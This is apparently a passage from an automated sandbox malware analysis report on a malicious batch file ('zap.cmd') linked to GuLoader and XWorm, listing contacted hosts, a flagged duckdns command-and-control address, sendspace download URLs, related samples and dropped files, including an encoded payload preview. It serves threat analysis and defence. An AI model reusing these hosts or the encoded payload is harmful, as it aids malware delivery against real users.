                      https://contoso.com/powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2609130468.00000000054F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.sendspace.com/%I8Vwab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/pscore68powershell.exe, 00000003.00000002.2727560719.0000024C57781000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/jj4uw4XRpowershell.exe, 00000006.00000002.2592434274.00000000045ED000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n4.sendspaXpowershell.exe, 00000003.00000002.2727560719.0000024C59558000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2727560719.0000024C57781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2592434274.0000000004491000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      69.31.136.17
                      		fs03n4.sendspace.comUnited States
                      		3257GTT-BACKBONEGTTDEfalse
                      12.202.180.134
                      		tbsagyw.duckdns.orgUnited States
                      		22983FISERV-INCUStrue
                      104.21.28.80
                      		www.sendspace.comUnited States
                      		13335CLOUDFLARENETUSfalse

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1446788
                      Start date and time:2024-05-23 21:11:18 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 34s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:zap.cmd
                      Detection:MAL
                      Classification:mal100.troj.evad.winCMD@13/9@4/3
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HCA Information:
                      • Successful, ratio: 91%
                      • Number of executed functions: 57
                      • Number of non-executed functions: 1
                      Cookbook Comments:
                      • Found application associated with file extension: .cmd

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 5092 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 5144 because it is empty
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: zap.cmd

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      15:12:11API Interceptor6496x Sleep call for process: powershell.exe modified
                      15:13:04API Interceptor334811x Sleep call for process: wab.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      69.31.136.17xff.cmdGet hashmaliciousGuLoader, XWormBrowse
                        las.cmdGet hashmaliciousGuLoaderBrowse
                          zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                              new.cmdGet hashmaliciousGuLoaderBrowse
                                las.cmdGet hashmaliciousGuLoaderBrowse
                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                      upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                        update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                          12.202.180.134xff.cmdGet hashmaliciousGuLoader, XWormBrowse
                                            zap.cmdGet hashmaliciousUnknownBrowse
                                              zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                update.cmdGet hashmaliciousUnknownBrowse
                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                      las.cmdGet hashmaliciousGuLoaderBrowse
                                                        kam.cmdGet hashmaliciousUnknownBrowse
                                                          sample.cmdGet hashmaliciousUnknownBrowse
                                                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                              104.21.28.80xff.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                      kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                        upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                          update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                            file.vbsGet hashmaliciousGuLoaderBrowse
                                                                              windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                update.vbsGet hashmaliciousGuLoaderBrowse

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  fs03n1.sendspace.comnew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 69.31.136.17
                                                                                  upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 69.31.136.17
                                                                                  windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 69.31.136.17
                                                                                  windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 69.31.136.17
                                                                                  fs03n4.sendspace.comxff.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 69.31.136.17
                                                                                  new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 69.31.136.17
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 69.31.136.17
                                                                                  kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 69.31.136.17
                                                                                  1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                                                                  • 69.31.136.17
                                                                                  www.sendspace.comxff.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 104.21.28.80
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 172.67.170.105
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 172.67.170.105
                                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 172.67.170.105
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 172.67.170.105
                                                                                  kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 172.67.170.105
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 104.21.28.80
                                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 172.67.170.105
                                                                                  las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 172.67.170.105

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSbas.cmdGet hashmaliciousUnknownBrowse
                                                                                  • 104.16.231.132
                                                                                  xff.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 104.21.28.80
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 172.67.170.105
                                                                                  https://cas5-0-urlprotect.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fgoogle.jp%2famp%2fs%2fjbx.silsbeekiaimports.us&umid=7eb8d47e-9d0c-47da-ae2a-8c43fe69fc7e&auth=6c94a71134cc7c92741d5538b555b091522e5e80-6d0e2f552f3dd2ebe4b30ade9b482f57c85f8c8f#Z2F5bGVAc2hyZXZlcG9ydGNoYW1iZXIub3Jn%2Fhc%2Farticles%2F360001376909%3Futm_campaign%3Dorder-confirmation-transactional%26utm_source%3Dblueshift%26utm_medium%3Demail%26utm_content%3Dtest-new-prod-recs-v2-lousersed-transactional-order-confirmation&d=DwMFaQGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.17.2.184
                                                                                  https://equifax.secure.virtru.com/start/?c=experiment&t=emailtemplate2019-09&s=twn_noreply%40equifax.com&p=d5b52cbc-0569-42e0-86cf-8416889c1b1d#v=3.0.0&d=https%3A%2F%2Fapi.virtru.com%2Fstorage%2Fapi%2Fpolicies%2Fd5b52cbc-0569-42e0-86cf-8416889c1b1d%2Fdata%2Fmetadata&dk=CSTBBNbTEYumPZCavpjONtXXrHKWZsLJITyIS27OqaA%3DGet hashmaliciousUnknownBrowse
                                                                                  • 104.16.117.116
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 172.67.170.105
                                                                                  https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3DGet hashmaliciousUnknownBrowse
                                                                                  • 104.17.3.184
                                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 172.67.170.105
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 172.67.170.105
                                                                                  GTT-BACKBONEGTTDExff.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 69.31.136.57
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 69.31.136.57
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 69.31.136.57
                                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 69.31.136.57
                                                                                  new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 69.31.136.57
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 69.31.136.17
                                                                                  kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 69.31.136.53
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 69.31.136.53
                                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 69.31.136.53
                                                                                  las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 69.31.136.53
                                                                                  FISERV-INCUSxff.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 12.202.180.134
                                                                                  zap.cmdGet hashmaliciousUnknownBrowse
                                                                                  • 12.202.180.134
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 12.202.180.134
                                                                                  update.cmdGet hashmaliciousUnknownBrowse
                                                                                  • 12.202.180.134
                                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 12.202.180.134
                                                                                  new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 12.202.180.134
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 12.202.180.134
                                                                                  kam.cmdGet hashmaliciousUnknownBrowse
                                                                                  • 12.202.180.134
                                                                                  sample.cmdGet hashmaliciousUnknownBrowse
                                                                                  • 12.202.180.134
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 12.202.180.134

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0exff.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  filePY.cmdGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  37f463bf4616ecd445d4a1937da06e19xff.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17
                                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  • 104.21.28.80
                                                                                  • 69.31.136.17

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):11608
                                                                                  Entropy (8bit):4.8908305915084105
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                                  MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                                  SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                                  SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                                  SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:NlllulBiPlllZ:NllUUd
                                                                                  MD5:2C728892207486CD886F1A3557B47848
                                                                                  SHA1:673A0EF98F6F703E7A95ECB62A403AF0F7290CA8
                                                                                  SHA-256:986058A667E62EE45B9A966E20CC456D2562E0C40544F251158265AABC2D84F5
                                                                                  SHA-512:11C49519360638895E0A3CDA651D9AE56CC787BFB3BDD26076ED83A686DF82642902CB0899A552CD396EFF7F882949D422361063153DCFDC7A1D7766586103C3
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:@...e...................................(............@..........

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cyjwm3f.enn.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trerqzvk.t1n.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhdutsjh.vxt.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zggjvx1h.qtt.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Roaming\Innumerable.Sno

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):489216
                                                                                  Entropy (8bit):5.935106757254994
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:XxxLpZqkQSRcQZg5nN94/iNzk5NKanAeDH:XsjJN9fNA5N/hH
                                                                                  MD5:E6ECB4577C73A32DC43D8D01CC10CADB
                                                                                  SHA1:86D431761162D03713D45BFFF6ACCD0D23411775
                                                                                  SHA-256:C003AC50DA0EFA115BFEAAEA28F7BEF37DF720AAD045C1FE8BD8EDE0E3DE7554
                                                                                  SHA-512:9B8ED24618E83B3B067FE1490F7F6F0FD50FE5F7973624300D463107150A6E2D1D6C2BC3B5D6535F563B3A5B29994E0C7EAE5B49DED9F12A67341D593836DA07
                                                                                  Malicious:false
                                                                                  Preview:cQGbcQGbux9CDgDrAkKH6wI2uANcJARxAZvrAtkKubbjeMjrAgRE6wJXZ4Hpg6AADusCJTHrApgNgfEzQ3i6cQGb6wJQTesCwUfrAsU3unHMRY7rAnjl6wI6sesC0lBxAZsxyusCdqjrAtskiRQL6wI9LesCnwrR4usCE8zrAsQIg8EE6wLnl3EBm4H5oXCJA3zIcQGbcQGbi0QkBHEBm3EBm4nDcQGb6wLH34HDuntZAesCOSVxAZu6BGPlDnEBm3EBm4Hq/nOr0HEBm3EBm4HC+hDGwesC6jXrAs50cQGb6wInJusCyFnrAq/PiwwQcQGbcQGbiQwTcQGbcQGbQnEBm3EBm4H6pDEFAHXXcQGbcQGbiVwkDHEBm3EBm4HtAAMAAOsCPgLrApdAi1QkCHEBm3EBm4t8JATrAlP5cQGbietxAZvrAg9MgcOcAAAA6wL3sOsClY9T6wJj1XEBm2pA6wJ6jXEBm4nr6wL6qOsC967HgwABAAAAwJoD6wLdD+sCakGBwwABAABxAZvrAnonU3EBm3EBm4nrcQGb6wLTc4m7BAEAAHEBm3EBm4HDBAEAAOsC2w5xAZtTcQGb6wJkT2r/cQGb6wJZ4YPCBesC8YrrAlY7MfbrArMIcQGbMclxAZvrAheMixpxAZtxAZtBcQGbcQGbORwKdfRxAZtxAZtGcQGb6wKEEYB8Cvu4dd/rAsF66wKaWotECvzrAmAxcQGbKfDrAqM06wKI3v/ScQGb6wIxC7qkMQUAcQGbcQGbMcBxAZvrAgcIi3wkDOsCj9VxAZuBNAeDS6DT6wKwGesCBzeDwATrAsd/cQGbOdB143EBm3EBm4n76wIZ33EBm//X6wIRinEBm+XOaFd2cnpaZsLVVz3gucGqylZyap5QUnUwPR7MymZcFr7J+nfA1VfWzmpaZqCIWMs98qgiWa0tccVihM7IThiGM19Yyz3yqCJZrS1xxWKEzshOGIYzX2oz9kr8AqKPsdKS

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6224
                                                                                  Entropy (8bit):3.733476767572627
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:EVDEllDtgC3CyyU2UjIukvhkvklCywS0JojlHJYSogZoqUJojlLYSogZoe1:+vC3CQTNkvhkvCCtPJojZHUJojfHR
                                                                                  MD5:142E28218F4AB0A46B51ABFE61796679
                                                                                  SHA1:E08B465F1669AD362D043EE338D05EFDF4EE246A
                                                                                  SHA-256:8252B995B2FA49487A56E34B1491EBAB210B30942FDFDC6313BA0B972952CB10
                                                                                  SHA-512:2433FC1A9EB9A6BA9CA9C9D9E01DE7CFA4889B3B635EF45D91450E4967E585C0FFFEB725751CB6149896265FD7ED208E58227146A7C37999351584C5EB81B8F7
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...J.S...C...E...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...A ..E...@...E.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.............................^.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......EW<2.X....../.........................R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.X|.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.X|.....2.........................W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.X|.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.X|.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X......u...........

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VU7C3MF82ACSTAFRWRJN.temp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6224
                                                                                  Entropy (8bit):3.733476767572627
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:EVDEllDtgC3CyyU2UjIukvhkvklCywS0JojlHJYSogZoqUJojlLYSogZoe1:+vC3CQTNkvhkvCCtPJojZHUJojfHR
                                                                                  MD5:142E28218F4AB0A46B51ABFE61796679
                                                                                  SHA1:E08B465F1669AD362D043EE338D05EFDF4EE246A
                                                                                  SHA-256:8252B995B2FA49487A56E34B1491EBAB210B30942FDFDC6313BA0B972952CB10
